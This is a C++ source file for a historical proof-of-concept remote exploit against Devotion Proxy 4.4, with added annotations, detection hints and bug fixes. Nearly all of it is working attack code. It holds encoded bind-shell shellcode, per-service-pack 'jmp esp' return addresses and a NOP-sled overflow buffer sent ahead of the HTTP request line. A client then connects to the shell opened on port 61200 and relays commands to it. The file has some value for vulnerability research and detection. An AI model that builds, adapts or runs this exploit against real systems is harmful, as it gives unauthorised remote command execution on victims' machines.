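/*
 * m00-devproxy.cpp -- Devotion Proxy 4.4 stack overflow exploit (historical PoC)
 *
 * m00 Security presents....
 * Devotion Proxy 4.4 Stack Overflow Exploit
 * Vulnerability discovered by drG4njubas[m00]
 * Contacts: drG4njubas[at]bk.ru, http://m00.void.ru, #m00sec(@efnet)
 * Greets to Over_G, D4rkGr3y, r4ShR4y, h0snp, ...
 * (The original ASCII-art banner did not survive extraction and is omitted.)
 *
 * Compile with m$ visual c++: cl m00-devproxy.cpp
 *
 * How the payload is laid out (derived from the constants below):
 *  - 4096 bytes of 0x90 with the shellcode copied in at offset 1038.
 *  - At offset 4096 a 4-byte return address (a "jmp esp" inside a system DLL
 *    at a fixed, per-service-pack address: these targets predate ASLR), then
 *    9 NOPs and a 5-byte relative jmp (E9 FC F3 FF FF = -0xC04) whose
 *    destination is 4096 + 18 - 0xC04 = 1038, i.e. the shellcode.
 *  - Everything above is sent BEFORE the HTTP request-line text, so the
 *    overflow is triggered while the proxy parses the request line.
 *
 * Security notes for anyone reading or running this:
 *  - The shellcode is a bind shell on TCP/61200 with no authentication. While
 *    it is running, anyone who can reach the host gets a shell; run this only
 *    against systems you are authorised to test and on an isolated network.
 *  - Detection: an HTTP request whose first ~4 KB are 0x90 followed by
 *    " /Proxy.dtl?URL=", then a new listener on port 61200 on the proxy host.
 *  - The listing as extracted had lost the header names in the #include lines,
 *    the <host> <port> <target> placeholders in usage(), and was duplicated
 *    end-to-end; all three are repaired here. Header names are reconstructed
 *    from the APIs actually used.
 *  - Fixed defects: negative target index was not rejected (OOB read of
 *    targets[]), recv() into the interactive buffer could write the NUL one
 *    byte past the end, a closed shell socket spun the console loop forever,
 *    and socket/send/resolver results were never checked.
 */

#include <windows.h>   /* reconstructed: WSA*, SOCKET, CreateThread(), Sleep() */
#include <stdio.h>     /* reconstructed: printf(), fgets() */
#include <stdlib.h>    /* reconstructed: atoi() */
#include <string.h>    /* reconstructed: memcpy(), memset(), strlen() */
#include <conio.h>     /* reconstructed: kbhit() */
#pragma comment (lib,"wsock32")

#define OVERFLOW_LEN   4096   /* bytes of sled before the saved return address */
#define SHELLCODE_OFF  1038   /* offset of the shellcode inside the sled */
#define SHELL_PORT     61200  /* port the payload binds its shell to */

/*
 * Per-platform "jmp esp" address that overwrites the saved return address.
 * These are absolute addresses in system DLLs and only hold for the exact
 * service pack listed. The table is terminated by a NULL platform entry.
 */
static struct {
    const char *platform;
    DWORD retaddr;  /* jmp esp */
} targets[] = {
    { "Windows 2000 SP1", 0x77e3cb4c },
    { "Windows 2000 SP2", 0x77e2492b },
    { "Windows 2000 SP3", 0x77e2afc5 },
    { "Windows 2000 SP4", 0x77e14c29 },
    { "Windows XP SP0",   0x77f5801c },
    { "Windows XP SP1",   0x77e626ba },
    { "Windows NT SP6",   0x77f32935 },
    { NULL, 0 }
};

/*
 * Shellcode: binds a shell to port 61200 (sources were published on www.m00.ru).
 * The first bytes are a decoder (xor byte [eax],0x92 / inc eax / cmp with the
 * "m00!" marker / jnz) that decodes the rest in place; the trailing
 * "\x6D\x30\x30\x21" is that marker. Decoding by hand shows the usual API
 * strings (GetProcAddress, ws2_32, cmd) and the port 0xEF10 = 61200.
 */
static char shellcode[] =
    "\xEB\x0F\x58\x80\x30\x92\x40\x81\x38\x6D\x30\x30\x21\x75\xF4"
    "\xEB\x05\xE8\xEC\xFF\xFF\xFF\x7B\xC6\x93\x92\x92\xCF\xC7\xA3"
    "\x49\xF6\x19\x91\xD2\x01\x19\xD1\x6D\xD2\xE7\x6B\x19\xC1\x91"
    "\xF4\xA3\x40\xF4\x2A\x92\x82\xF4\x13\xA8\xDF\xC8\xE6\x95\xBB"
    "\x50\x7B\x60\x6D\x6D\x6D\x1B\x41\x19\xE8\xAE\x93\x45\x91\xCD"
    "\xEA\x19\xD9\x8A\x19\xE1\xB2\x19\xE9\xB6\x93\x44\x93\x45\x6E"
    "\x3F\x93\x42\x04\x15\x6F\xC3\xA3\x5B\x12\x53\x9D\x61\x34\xE0"
    "\x98\x04\xCB\x15\x6F\xE6\x80\xD5\xD5\x70\x74\x2C\x9D\x92\x92"
    "\x92\xBB\x5C\xBB\x65\x7B\x7A\x6D\x6D\x6D\xA3\x52\xF4\x19\x95"
    "\x53\x72\x90\x19\xE1\x8E\x93\x44\x93\x54\x3F\x93\x42\x1B\x54"
    "\x1B\x45\xCF\xC5\x1F\x0F\x9D\x92\x92\x92\xC1\xC5\x6D\x44\x1F"
    "\x0F\xC1\x92\x92\x92\xC1\x6D\x42\x1B\x55\x1F\x0F\xC8\x92\x92"
    "\x92\xC1\xC2\x6D\x44\xA3\x5B\xC3\xC3\xC3\xC3\xFA\x93\x92\x92"
    "\x92\xFA\x90\x92\x92\x92\x6D\x42\x1B\x51\x1F\x17\xF7\x92\x92"
    "\x92\xC2\xC5\x6D\x44\xFA\x82\x92\x92\x92\x1F\x1F\xEA\x92\x92"
    "\x92\xC3\xC1\x6D\x42\x1F\x17\xF8\x92\x92\x92\xC2\xC5\x6D\x44"
    "\xFA\x93\x92\x92\x92\xC1\x6D\x42\x1F\x17\xE3\x92\x92\x92\xC2"
    "\xC5\x6D\x44\xA3\x5B\xC3\xC3\xC1\x6D\x42\xCD\xC2\x1F\x0F\xD5"
    "\x92\x92\x92\xC1\xC5\x6D\x44\xFA\x6D\x92\x92\x92\xFA\xD2\x92"
    "\x92\x92\x6D\x42\x1B\x51\x1F\x1F\xBA\x92\x92\x92\xC3\xC5\x6D"
    "\x44\xC1\x6D\x42\xCA\x1B\xD1\xD2\x1B\xD1\xAE\x1B\xD1\xAA\x55"
    "\xD1\xBE\x93\x93\x92\x92\x1F\x17\xAA\x92\x92\x92\xC2\xC5\x6D"
    "\x44\xC1\xC1\xA3\x5B\xC3\xC3\xC3\xFA\x93\x92\x92\x92\xC3\xC3"
    "\x1F\x0F\x1E\x92\x92\x92\xC1\xC3\x6D\x42\x1F\x17\x8E\x92\x92"
    "\x92\xC2\xC5\x6D\x44\x6D\x42\x7A\x35\x6C\x6D\x6D\xD5\xF7\xE6"
    "\xC2\xE0\xFD\xF1\xD3\xF6\xF6\xE0\xF7\xE1\xE1\x92\xDE\xFD\xF3"
    "\xF6\xDE\xFB\xF0\xE0\xF3\xE0\xEB\xD3\x92\xD7\xEA\xFB\xE6\xC2"
    "\xE0\xFD\xF1\xF7\xE1\xE1\x92\xD5\xF7\xE6\xC1\xE6\xF3\xE0\xE6"
    "\xE7\xE2\xDB\xFC\xF4\xFD\xD3\x92\xD1\xE0\xF7\xF3\xE6\xF7\xC2"
    "\xE0\xFD\xF1\xF7\xE1\xE1\xD3\x92\xD5\xFE\xFD\xF0\xF3\xFE\xD3"
    "\xFE\xFE\xFD\xF1\x92\xE5\xE1\xA0\xCD\xA1\xA0\x92\xC5\xC1\xD3"
    "\xC1\xFD\xF1\xF9\xF7\xE6\xD3\x92\xF0\xFB\xFC\xF6\x92\xFE\xFB"
    "\xE1\xE6\xF7\xFC\x92\xF3\xF1\xF1\xF7\xE2\xE6\x92\x90\x92\x7D"
    "\x82\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x93\x92"
    "\x92\x92\xF1\xFF\xF6\x92\x6D\x30\x30\x21";

/*
 * Trailer placed at OVERFLOW_LEN: the 4-byte return address (patched in from
 * targets[] at run time), nine NOPs for the "jmp esp" to land in, then a
 * relative jmp of -0xC04 back to SHELLCODE_OFF. sizeof(jump)-1 = 18 bytes
 * are copied; the string's terminating NUL is not.
 */
static char jump[] =
    "\x29\x4c\xe1\x77"          /* retaddr, overwritten per target */
    "\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90"
    "\xE9\xFC\xF3\xFF\xFF";     /* jmp -0xC04 -> offset 1038 */

/*
 * Request-line text that follows the overflow bytes. Note the leading space:
 * the sled itself stands in for the HTTP method token.
 */
static char request[] =
    " /Proxy.dtl?URL=www.m00.ru HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\n"
    "Connection: Keep-Alive\r\n"
    "Cookie: session-id=1\r\n\r\n";

static void usage(void);
static void have_fun(SOCKET sock);
static DWORD WINAPI recv_thread(LPVOID lpParam);
static int send_all(SOCKET sock, const char *data, int len);

/*
 * Entry point: m00-devproxy.exe <host> <port> <target>
 *
 * Builds the overflow buffer, sends it followed by the request text, then
 * tries to connect to the bind shell the payload opens on SHELL_PORT.
 * Returns 0 on a spawned shell, 1 on any error.
 */
int main(int argc, char **argv)
{
    WSADATA wsaData;
    SOCKADDR_IN rmaddr;
    HOSTENT *addr;
    SOCKET sock, shell;
    HANDLE reader;
    DWORD tmp;
    char exploit[OVERFLOW_LEN + sizeof(jump)];
    int ntargets, t, port;

    printf("\n*******************************************\n");
    printf(" Devotion Proxy buffer overflow exploit \n");
    printf(" Coded by drG4jubas[m00 Crew] \n");
    printf("*******************************************\n\n");

    if (argc < 4) {
        usage();
        return 1;
    }

    /* Count targets, then validate the index. atoi() may return a negative
     * number; the original only rejected t >= count, so "-1" would read
     * before the start of targets[]. */
    for (ntargets = 0; targets[ntargets].platform; ntargets++)
        ;
    t = atoi(argv[3]);
    if (t < 0 || t >= ntargets) {
        printf("Bad target\n");
        return 1;
    }

    port = atoi(argv[2]);
    if (port <= 0 || port > 65535) {
        printf("Bad port\n");
        return 1;
    }

    /* Sanity-check the layout so a longer shellcode can never run into the
     * trailer at OVERFLOW_LEN. */
    if (SHELLCODE_OFF + (sizeof(shellcode) - 1) > OVERFLOW_LEN) {
        printf("Shellcode does not fit in the sled\n");
        return 1;
    }

    /* Patch the per-target return address into the trailer (little-endian,
     * exactly as the DWORD is laid out in memory). */
    memcpy(jump, &targets[t].retaddr, sizeof(DWORD));

    /* Sled of NOPs, shellcode at SHELLCODE_OFF, trailer at OVERFLOW_LEN. */
    memset(exploit, '\x90', sizeof(exploit));
    memcpy(exploit + SHELLCODE_OFF, shellcode, sizeof(shellcode) - 1);
    memcpy(exploit + OVERFLOW_LEN, jump, sizeof(jump) - 1);

    if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
        printf("WSAStartup failed\n");
        return 1;
    }

    addr = gethostbyname(argv[1]);
    if (addr == NULL || addr->h_addrtype != AF_INET ||
        addr->h_length != (int)sizeof(rmaddr.sin_addr)) {
        printf("Can not resolve host name\n");
        WSACleanup();
        return 1;
    }

    memset(&rmaddr, 0, sizeof(rmaddr));
    rmaddr.sin_family = AF_INET;
    rmaddr.sin_port = htons((u_short)port);
    memcpy(&rmaddr.sin_addr, addr->h_addr_list[0], sizeof(rmaddr.sin_addr));

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == INVALID_SOCKET) {
        printf("socket() failed\n");
        WSACleanup();
        return 1;
    }

    printf("Connecting to %s...", argv[1]);
    if (connect(sock, (struct sockaddr *)&rmaddr, sizeof(rmaddr)) != 0) {
        printf("failed\n");
        closesocket(sock);
        WSACleanup();
        return 1;
    }
    printf("ok\n");

    /* The whole exploit buffer goes first, then the request text. The
     * request's terminating NUL goes on the wire too, as in the original;
     * left unchanged so the byte stream that was tested is preserved. */
    printf("Sending exploit...");
    if (send_all(sock, exploit, (int)sizeof(exploit)) != 0 ||
        send_all(sock, request, (int)sizeof(request)) != 0) {
        printf("send failed\n");
        closesocket(sock);
        WSACleanup();
        return 1;
    }
    printf("done\n");

    /* Drain whatever the proxy answers in the background; the handle is not
     * needed afterwards, so close it to avoid leaking it. The thread may still
     * be blocked in recv() on `sock` when we close it below, which simply
     * fails that recv(). */
    reader = CreateThread(NULL, 0, recv_thread, (LPVOID)sock, 0, &tmp);
    if (reader != NULL)
        CloseHandle(reader);
    Sleep(100);

    /* The payload binds a shell on SHELL_PORT of the same host. */
    shell = socket(AF_INET, SOCK_STREAM, 0);
    if (shell == INVALID_SOCKET) {
        printf("socket() failed\n");
        closesocket(sock);
        WSACleanup();
        return 1;
    }
    rmaddr.sin_port = htons(SHELL_PORT);
    if (connect(shell, (struct sockaddr *)&rmaddr, sizeof(rmaddr)) != 0) {
        printf("Exploitation failed:(\n");
        closesocket(shell);
        closesocket(sock);
        WSACleanup();
        return 1;
    }

    printf("Congratulations!!! Shell spawned :D\n\n");
    have_fun(shell);

    closesocket(shell);
    closesocket(sock);
    WSACleanup();
    return 0;
}

/*
 * send() until all `len` bytes are out, since a stream send may be short.
 * Returns 0 on success, -1 on error or a zero-length send.
 */
static int send_all(SOCKET sock, const char *data, int len)
{
    int done = 0;

    while (done < len) {
        int n = send(sock, data + done, len - done, 0);
        if (n == SOCKET_ERROR || n == 0)
            return -1;
        done += n;
    }
    return 0;
}

/* Prints the command line and the numbered target table. */
static void usage(void)
{
    int i;

    printf("USAGE: ");
    /* The <host> <port> <target> placeholders were lost in extraction and are
     * reconstructed from how argv[1..3] are used in main(). */
    printf("m00-devproxy.exe <host> <port> <target>\n\n");
    printf("Target platforms:\n");
    for (i = 0; targets[i].platform; i++)
        printf("%d - %s\n", i, targets[i].platform);
}

/*
 * Background reader for the exploit socket: performs one recv() of up to
 * 128 bytes and discards the result. Nothing inspects the data.
 */
static DWORD WINAPI recv_thread(LPVOID lpParam)
{
    SOCKET sock = (SOCKET)lpParam;
    char buf[128];

    (void)recv(sock, buf, sizeof(buf), 0);
    return 0;
}

/*
 * Minimal interactive console over the bind shell: relays socket output to
 * stdout and keyboard lines to the socket until the socket errors or closes.
 *
 * Output is printed via fputs, never as a format string: the bytes come from
 * a remote process. Data is NUL-terminated for printing, so an embedded NUL
 * truncates that chunk on screen (it is still fully received).
 */
static void have_fun(SOCKET sock)
{
    char buf[1024];
    int ready;
    fd_set fdread;
    TIMEVAL tv;

    tv.tv_sec = 1;
    tv.tv_usec = 0;

    do {
        FD_ZERO(&fdread);
        FD_SET(sock, &fdread);
        ready = select(0, &fdread, NULL, NULL, &tv);

        if (ready > 0) {
            /* Read one byte less than the buffer so the NUL below stays in
             * bounds; the original read 1024 and could write buf[1024]. */
            int got = recv(sock, buf, (int)sizeof(buf) - 1, 0);
            if (got == SOCKET_ERROR || got == 0)
                break;  /* error, or peer closed: a closed socket stays
                           "readable" and would otherwise spin this loop */
            buf[got] = '\0';
            fputs(buf, stdout);
        }

        if (kbhit()) {
            if (fgets(buf, (int)sizeof(buf), stdin) == NULL)
                break;  /* EOF on stdin: nothing more to relay */
            send(sock, buf, (int)strlen(buf), 0);
            /* A bare CR is turned into LF so the remote shell sees a line end. */
            if (buf[0] == '\r') {
                buf[0] = '\n';
                printf("%c", buf[0]);
                send(sock, buf, 1, 0);
            }
        }
    } while (ready != SOCKET_ERROR);
}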